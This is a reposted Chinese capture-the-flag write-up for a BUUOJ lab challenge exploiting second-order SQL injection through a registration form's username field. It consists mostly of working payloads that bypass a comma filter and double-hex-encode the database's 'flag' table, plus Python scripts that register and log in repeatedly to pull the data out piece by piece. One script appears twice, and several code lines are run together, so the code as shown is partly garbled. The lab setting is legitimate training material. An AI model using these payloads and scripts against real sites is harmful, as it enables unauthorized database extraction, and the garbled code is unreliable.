过滤了
,分割时使用from 1 for 10绕过
0'+hex编码要读取的信息+'0
要进行二次编码一次编码会被截断
解法1
payload:0'+(select substr(hex(hex((select * from flag))) from 1 for 10))+'0
脚本
#coding:utf-8import requestsimport reimport timefrom bs4 import BeautifulSoupstr=''headers={ 'User-Agent':"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36", 'Referer':"https://www.lagou.com/jobs/list_python/p-city_252?px=default&;gx=%E5%85%A8%E8%81%8C&gj=&xl=%E6%9C%AC%E7%A7%91&isSchoolJob=1", 'Accept':'application/json, text/javascript, */*; q=0.01'}
url_log= 'http://abf69fd1-7f0f-4127-ac0c-b8def3a0944f.node4.buuoj.cn:81/login.php'url_reg= 'http://abf69fd1-7f0f-4127-ac0c-b8def3a0944f.node4.buuoj.cn:81/register.php'for i in range(0,100):
payload="0'+(select substr(hex(hex((select * from flag))) from {} for 10))+'0".format(1+i*10)
#print(payload)
data_reg ={"email":"11111231{}@qq.com".format(i),"username":payload, "password" : "123"}
data_log ={"email":"11111231{}@qq.com".format(i),"password" : "123"}
res1=requests.post(url_reg,headers=headers,data=data_reg)
time.sleep(1)
res=requests.post(url_log,headers=headers,data=data_log)
soup = BeautifulSoup(res.text,'html.parser')
print(soup.span.text) #str=str+','+soup.span.text
#print(str)解法2
payload:0'+ascii(substr((select * from flag) from {} for 1))+'0
脚本
#coding:utf-8import requestsimport reimport timefrom bs4 import BeautifulSoupstr=''headers={ 'User-Agent':"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36", 'Referer':"https://www.lagou.com/jobs/list_python/p-city_252?px=default&;gx=%E5%85%A8%E8%81%8C&gj=&xl=%E6%9C%AC%E7%A7%91&isSchoolJob=1", 'Accept':'application/json, text/javascript, */*; q=0.01'}
url_log= 'http://abf69fd1-7f0f-4127-ac0c-b8def3a0944f.node4.buuoj.cn:81/login.php'url_reg= 'http://abf69fd1-7f0f-4127-ac0c-b8def3a0944f.node4.buuoj.cn:81/register.php'for i in range(1,100):
payload="0'+ascii(substr((select * from flag) from {} for 1))+'0".format(i)
#print(payload)
data_reg ={"email":"111112{}@qq.com".format(i),"username":payload, "password" : "123"}
data_log ={"email":"111112{}@qq.com".format(i),"password" : "123"}
res1=requests.post(url_reg,headers=headers,data=data_reg)
time.sleep(1)
res=requests.post(url_log,headers=headers,data=data_log)
soup = BeautifulSoup(res.text,'html.parser')
print(soup.span.text) str=str+','+soup.span.text
print(str)#coding:utf-8import requestsimport reimport timefrom bs4 import BeautifulSoupstr=''headers={ 'User-Agent':"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36", 'Referer':"https://www.lagou.com/jobs/list_python/p-city_252?px=default&;gx=%E5%85%A8%E8%81%8C&gj=&xl=%E6%9C%AC%E7%A7%91&isSchoolJob=1", 'Accept':'application/json, text/javascript, */*; q=0.01'}
url_log= 'http://abf69fd1-7f0f-4127-ac0c-b8def3a0944f.node4.buuoj.cn:81/login.php'url_reg= 'http://abf69fd1-7f0f-4127-ac0c-b8def3a0944f.node4.buuoj.cn:81/register.php'for i in range(1,100):
payload="0'+ascii(substr((select * from flag) from {} for 1))+'0".format(i)
#print(payload)
data_reg ={"email":"111112{}@qq.com".format(i),"username":payload, "password" : "123"}
data_log ={"email":"111112{}@qq.com".format(i),"password" : "123"}
res1=requests.post(url_reg,headers=headers,data=data_reg)
time.sleep(1)
res=requests.post(url_log,headers=headers,data=data_log)
soup = BeautifulSoup(res.text,'html.parser')
print(soup.span.text) str=str+','+soup.span.text
print(str)
转自:https://www.cnblogs.com/da-wn/p/15359314.html
更多文章请关注《万象专栏》
转载请注明出处:https://www.wanxiangsucai.com/read/cv2954